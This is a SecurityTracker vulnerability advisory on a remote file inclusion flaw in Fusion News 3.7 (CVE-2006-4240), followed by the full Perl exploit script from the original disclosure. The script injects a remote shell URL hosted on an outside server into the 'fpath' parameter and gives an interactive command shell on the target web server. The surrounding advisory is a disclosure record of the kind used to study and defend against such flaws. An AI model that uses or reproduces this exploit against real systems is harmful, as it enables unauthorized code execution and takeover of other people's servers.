SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Fusion News Vendors:   FusionPHP
Fusion News Include File Bug in 'fpath' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016701
SecurityTracker URL:  http://securitytracker.com/id/1016701
CVE Reference:   CVE-2006-4240   (Links to External Site)
Updated:  Jun 5 2008
Original Entry Date:  Aug 16 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.7
Description:   A vulnerability was reported in Fusion News. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'fpath' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

OUTLAW discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  fusionphp.net/forums/index.php?showforum=28 (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  fusionnews 3,7 Remote File Inclusion

#!/usr/bin/perl

	###########################################################################################

	#			Aria-Security.net Advisory                                   															     #

	#			Discovered  by: OUTLAW                                    														               #

	#			< www.Aria-security.net >                               														              #

	#		Gr33t to: A.u.r.a  & HessamX & Cl0wn & DrtRp													                       	  #

	#		  Special Thanx To All Aria-Security Users      			  													 #

	###########################################################################################


use LWP::UserAgent;

print "\n === Fusion News v3.7 Remote File Inclusion\n";

print "\n === Discovered by OutLaw .\n";

print "\n  === www.Aria-Security.Net\n";


$bPath = $ARGV[0];

$cmdo = $ARGV[1];

$bcmd = $ARGV[2];


if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}




while()

{

       print "[Shell] \$";

while(<STDIN>)

       {

               $cmd=$_;

               chomp($cmd);


$xpl = LWP::UserAgent->new() or die;

$req = HTTP::Request->new(GET =>$bpath.'index.php?fpath='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n Could not connect !\n";

$res = $xpl->request($req);

$return = $res->content;


if (!$cmd) {print "\nPlease type a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/)

       {print "\n Could Not Connect to cmd Host\n";exit}

elsif ($return =~/^<b>Fatal.error/) {print "\n Invalid Command\n"}

if($return =~ /(.*)/)

{

       $freturn = $1;


       print "\r\n$freturn\n\r";

       last;

}


else {print "[Shell] \$";}}}last;


sub usage()

 {

print " Usage : fusion.pl [host] [cmd shell location] [cmd shell variable]\n";

print " Example : fusion.pl http://fusionnews.com http://www.shell.com/cmd.txt cmd\n";

 exit();

 }


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC